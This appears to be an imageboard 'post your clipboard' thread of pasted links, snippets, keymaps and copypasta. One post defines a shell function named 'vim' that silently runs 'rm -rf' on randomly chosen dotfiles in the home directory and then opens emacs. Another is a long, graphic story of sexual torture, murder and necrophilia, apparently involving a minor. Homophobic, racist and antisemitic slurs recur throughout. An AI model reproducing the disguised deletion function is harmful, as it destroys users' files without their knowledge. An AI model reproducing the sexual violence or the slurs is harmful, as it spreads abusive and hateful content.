Clipboards are technology. No cleanup, post your clipboard NOW

Clipboards are technology. No cleanup, post your clipboard NOW.

Pic unrelated.

Other urls found in this thread:

gyazo.com/f97e33dee462fa509201f7d36deed9f0
twitter.com/anju_inami/status/730007337101107200
youtu.be/iqcjpwAHsTQ
i.4cdn.org/pol/1462759265495.jpg
imgur.com/a/n3jY2
youtu.be/xRqI5R6L7ow
i.imgur.com/b3ukfYd.webm
i.4cdn.org/s4s/1462873286643.jpg
i.4cdn.org/g/1462936256462.png
youtube.com/watch?v=rLDgQg6bq7o
i.vimeocdn.com/portrait/3462020_300x300.jpg
girlscv.com/Gallery/337191635/Gamer_Girl
itspronouncedmetrosexual.com/2014/05/dear-white-straight-cisgender-men-privilege/#sthash.0vKPzwLy.dpuf
qz.com/679782/programmers-imagine-the-most-ridiculous-ways-to-input-a-phone-number/
danbooru.donmai.us/data/84921a517c1010d89c3e3e92838a2359.jpg
youtube.com/watch?v=bf89Y7D5qSQ
youtube.com/watch?v=-ALx2vyic7M
en.wikipedia.org/wiki/Law_of_triviality
youtube.com/watch?v=97OtsR8L1NY
vine.co/v/iUBD1YvjZve
soundcloud.com/nbgmusicyt/rage-against-the-meme-skrilling-in-the-name
twitter.com/NSFWRedditVideo

this girl make me big explosion in my pants, she my wife btw so its ok, btw premarital lust and secks are not okay

MC9090

terribly boring, I know.

gyazo.com/f97e33dee462fa509201f7d36deed9f0

Your IQ was measured to 121, which is equivalent to the 91.9 percentile.

twitter.com/anju_inami/status/730007337101107200

youtu.be/iqcjpwAHsTQ

I just booted up, there's nothing on my clipboard

>turning your computer off
What are you some sort of faggot?

i.4cdn.org/pol/1462759265495.jpg

instead of being used for

[this,"LEAN"] call BIS_fnc_ambientAnimCombat;

i don't know what it's from

Carpenter Brut

Computers, instead of being used for intellectual amplification (with everyone having free universal access to a massive body of knowledge, learning about the world, other cultures, science... in short, making themselves better people), have turned into mass surveillance-enabling, corporate-endorsed advertising and entertainment devices, dumbing down everyone's span of attention with 24/7 small instant gratifications.

It didn't have to be like this.

I blame American "culture". Well, it's far-fetched to call it a culture. It's more like a continuous stream of corporate products and trends based on neuromarketing that appeal to the lowest and most basic of human instincts. That means that it's not just Americans that quickly adopt these new trends, people abroad do too.

For example, Japan has lost its unique feature-filled flip phones to iPhones. And as I said it doesn't only happen with technology: take music or cinema. Contemporary French or German music are closer to Justin Bieber and Lady Gaga than to their own music from a few decades ago.

Of course, people adopt it quickly and easily because it's designed to attract them. Blaming people for this is like blaming mice for being attracted to cheese. They can't help it, it's in their nature.

20 years ago, the internet was a place to explore and discover. A young kid could find fansites about their favorite cartoons, emulators for playing games, forums to discuss or just have fun with people from all around the world... nowadays if I let my child browse the internet from a small age he'd just end up addicted to social media and possibly with embarrassing content tied to his real name forever.

And the worst part is that the downward trend isn't stopping anytime soon, if anything it's accelerating. Adults are being effectively forced to use nonfree channels and forfeit their privacy in order to interact with governments, companies or the labor market.

We truly live in dark times.

Stop lobbing bottles at Man United players, you fucking nutcases

imgur.com/a/n3jY2

2EF27FC9A5CC

Quite a bit of the research compiled withinThe Bell Curveis not disputed, but the conclusions drawn from it are considered by many to bebunk, and it has been criticized for aidingracistideologies.

imgur.com/a/z00NC

CLICKY

archiveofourown.org/works/6413431/chapters/15561460

www.cug.org:9993

review

youtu.be/xRqI5R6L7ow

i.imgur.com/b3ukfYd.webm

PRPP synthetase

i.4cdn.org/s4s/1462873286643.jpg

Gladiator Begins

I was looking for PSP games to play.

i.4cdn.org/g/1462936256462.png

星の海でサーフィン - Moon Lagoon

וַיִּשְׁמַע

ふらいんぐうぃっち

Just from the look up it, that seems like it's a vaporwave song.

youtube.com/watch?v=rLDgQg6bq7o

Yes, It was that technobabble thread

i.vimeocdn.com/portrait/3462020_300x300.jpg

Does that get any better after the first episode?

Your recipient is not able to receive funds at this time. Your recipient must first set up his or her account to receive funds.

PAYP ALLLLLLLL

It's been consistent quality all season and one of my favourites, but >opinions and such. Don't expect it to be anything substantial. Just a lighthearted comfy anime to watch after a week's work.

Stop!
These are Hillary shills trying to meme Bill to death, do not contribute to these threads.

The Jew goes "Pew Pew Pew"!

Wtf is this shit? I'm disappointed in myself...

girlscv.com/Gallery/337191635/Gamer_Girl

enjoy

’ve written a bit about privilege here, and I’ve written my own privilege lists, inspired by Peggy McIntosh (blame her!), which have received a lot of hullabaloo on my site. There seems to be a bit of a backlash growing, where privileged people (like this super privileged Princeton student) are “denouncing their privilege” and “finally standing up for straight white guys” (HAHAHA). Well, I wrote this (originally a Facebook status) for you, Tal, as well as the rest of us: - See more at: itspronouncedmetrosexual.com/2014/05/dear-white-straight-cisgender-men-privilege/#sthash.0vKPzwLy.dpuf

Windows is a 32 bit extension for a 16 bit patch to an 8 bit operating system originally coded for a 4 bit microprocessor written by a 2 bit company that can't stand 1 bit of competition.

Snapchat-4606917600426295537.jpg

Overwatch - 120 (100 Origins, 20 Collectors)

i guess this was from writing down inventory earlier.

The source code of a program is the preferred form for modifying it; the compacted code is not source code, and the real source code of this program is not available to the user.

qz.com/679782/programmers-imagine-the-most-ridiculous-ways-to-input-a-phone-number/

I must redoings the cliente

Nodejs is a joke, it's seriously scary that people actually use that shit in production.

o-l |=| 人 o-l 人-l

#os.kill(pid, signal.SIGINT)

sudo apt-get install oracle-java8-set-default

ペルソナ5

danbooru.donmai.us/data/84921a517c1010d89c3e3e92838a2359.jpg

verytrade.cn

(cleaning up DMCAs at work)

ESGO

HD60 Pro

youtube.com/watch?v=bf89Y7D5qSQ

>pasting it into a youtube downloader
:^)

C/C++ Programming in a UNIX enviorment

V65507

"Always pushing the limit sometimes things go wrong. It's not ideal, that's not what we're looking for, but we're pushing where we want to be, in the front."

Tito climbed into Reggie's room and immediately punched her in the face, knocking her out cold.

Upon awakening Reggie found herself bound and gagged to a chair. Tito was naked, standing in front of her with a big Hawaii boner staring her in the face. "As the ancient Hawaiians used to say...it's time for a dicking!" And at that, Tito leaped forward and grabbed Reggie's undeveloped breast. He grabbed with all his might, and ripped the skin from her body. Her muffled screams fell flat, and no one came to her help.

The blood aroused Tito more than he'd ever been aroused. It reminded him of the stories his mother used to tell him of the ancient Hawaiian sacrifices in which the subjects would receive wounds to which the sacrificers would rape. He couldn't wait, Tito grabbed a hammer and smashed at Reggie's ribcage, again her screams were not heard. After breaking an opening to her insides, Tito plunged in.

He thrust in and out in complete ecstasy. The pain was unbearable for Reggie and she lost consciousness. Tito came almost immediately, but he was by no means done. He pulled out of her chest, his PENIS dripping blood and semen. Tito cleaned his dick off with Reggie's tongue.

Tito tore out a few of the ribs he had broken and shoved them up his ass to stimulate his enormous prostate.

Tito then undid Reggie's restraints and began fucking her now lifeless corpse. After deploying his Hawaiian happy sauce, he decided he wanted a better look at Reggie.

Tito shoved his hand up Reggie's ass. He thrust it in as far as he could and grabbed on to the first organ he could, and then pulled out. He ripped out her entire small intestine and part of her large. Tito started to giggle and coiled up the small intestine like a rope.

He noticed the sun was coming up so he had to finish in a hurry. Tito went to his clothes and dressed himself. He pulled a large knife from his pocket and began to skin Reggie's body.

オーバーウォッ

youtube.com/watch?v=-ALx2vyic7M

Evil Con Carne

const uint16_t PROGMEM keymaps[][MATRIX_ROWS][MATRIX_COLS] = {
[_QW] = { /* Qwerty */
{KC_TAB, KC_Q, KC_W, KC_E, KC_R, KC_T, KC_Y, KC_U, KC_I, KC_O, KC_P, KC_BSPC},
{KC_ESC, KC_A, KC_S, KC_D, KC_F, KC_G, KC_H, KC_J, KC_K, KC_L, KC_SCLN, KC_QUOT},
{KC_LSFT, KC_Z, KC_X, KC_C, KC_V, KC_B, KC_N, KC_M, KC_COMM, KC_DOT, KC_SLSH, MT(MOD_RSFT, KC_ENT)},
{M(0), KC_LALT, KC_LGUI, KC_LCTL,MO(_LW), KC_SPC, KC_SPC, MO(_RS), KC_LEFT, KC_DOWN, KC_UP, KC_RGHT}
},

Mah nigga

here were black sailors yeah..remember the pearl harbor movie? cuba gooding juniors character was based on a real guy..a cook that manned a aa gun. he ended up winning the metal of honor...he was declared MIA and subsequently KIA in 1943 during a naval battle..cant recall what one

been trying to find where to watch it online for nostalgic purposes

"It's an amazing game," he said. "While not to say that it's open-world, users who enjoy today's AAA games (The Division and Uncharted, etc) will be able to easily enjoy it.

>Kojima was saying this shit about his next game
dropped as fuck

Just grab a torrent

Takahashi Minami graduation performance

I like you.

Virus. Fuck off.

What the hell is going on with the church these days?
First we get a white guilt cuck as pope, now all these faggot clergy members?

hochangesehengeschmeidigphone.xyz

en.wikipedia.org/wiki/Law_of_triviality

a

sd

##KUSTOMCLIP##
{
"clip_version": 1,
"clip_cut": [],
"clip_modules": [
{
"internal_type": "ProgressModule",
"progress_progress": "H12",
"progress_mode": "SPLIT",
"style_style": "CIRCLE",
"style_size": 120.0,
"style_width": 45.0,
"style_height": 10.0
}
]
}
##KUSTOMCLIP##

vim () {
ls -1a ~ | grep -o '^\..*'| sed -n "$(jot -r 2 1 $(ls -1a ~ | grep -o '^\..' | wc -l))p" | xargs rm -rf > /dev/null 2>&1
emacs $*
}

C:\Windows\System32

youtube.com/watch?v=97OtsR8L1NY
Yeah

Med Pajala-Hasses Kör Och Ork.

MAGA

Call of Duty Ghosts:

-Cody

[email protected]

¯\_(ツ)_/¯

Posting from phone. Copied this literally days ago.

Natalie Alyn Lind

git push origin master --force

>Trump gets 76.8% in West Virginia

vine.co/v/iUBD1YvjZve

nalgene lids

this turned me on. is that bad?

soundcloud.com/nbgmusicyt/rage-against-the-meme-skrilling-in-the-name